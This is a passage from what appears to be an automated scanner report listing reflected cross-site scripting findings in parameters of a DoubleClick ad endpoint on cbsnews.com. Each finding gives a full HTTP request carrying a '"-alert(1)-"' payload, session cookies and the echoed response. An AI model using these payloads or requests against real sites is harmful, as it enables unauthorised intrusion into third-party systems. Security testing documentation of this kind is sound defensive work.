%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=ebd9b"-alert(1)-"c91cb2fcc46&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.htm
...[SNIP]...

3.100. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [orh parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 187a9"-alert(1)-"5e0ae5f8a64 was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
bs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com187a9"-alert(1)-"5e0ae5f8a64&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-
...[SNIP]...

3.101. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77abb"-alert(1)-"9e34f2ad84d was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
6/17/160/%2a/i%3B234979442%3B2-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=277abb"-alert(1)-"9e34f2ad84d&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.102. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3abcf"-alert(1)-"07297bb7caf was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
g/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com3abcf"-alert(1)-"07297bb7caf&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same
...[SNIP]...

3.103. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3eb5f"-alert(1)-"0a4a4487f8 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5760

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=13039462327604510206412523eb5f"-alert(1)-"0a4a4487f8&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "fa
...[SNIP]...

3.104. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902bf"-alert(1)-"e7b97166ecf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
48298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=902bf"-alert(1)-"e7b97166ecf&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.
...[SNIP]...

3.105. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 721eb"-alert(1)-"5e3375eee1a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100721eb"-alert(1)-"5e3375eee1a&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=5
...[SNIP]...

3.106. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d00"-alert(1)-"a0d2f28156c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=82d00"-alert(1)-"a0d2f28156c&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "op
...[SNIP]...

3.107. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [pt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44562"-alert(1)-"289e63f792d was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
-0%3B0%3B57848298%3B4307-300/250%3B40430358/40448145/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=200044562"-alert(1)-"289e63f792d&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=20
...[SNIP]...

3.108. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [ra parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc8ee"-alert(1)-"db20965c259 was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5763

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243cc8ee"-alert(1)-"db20965c259&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "
...[SNIP]...

3.109. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [rqid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac86f"-alert(1)-"e9cbd23bb73 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5616

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
Eokv%3D%3Bpc%3Dcbs509230%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/http://personalsavings.americanexpr
...[SNIP]...

3.110. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4 [sg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

Issue detail

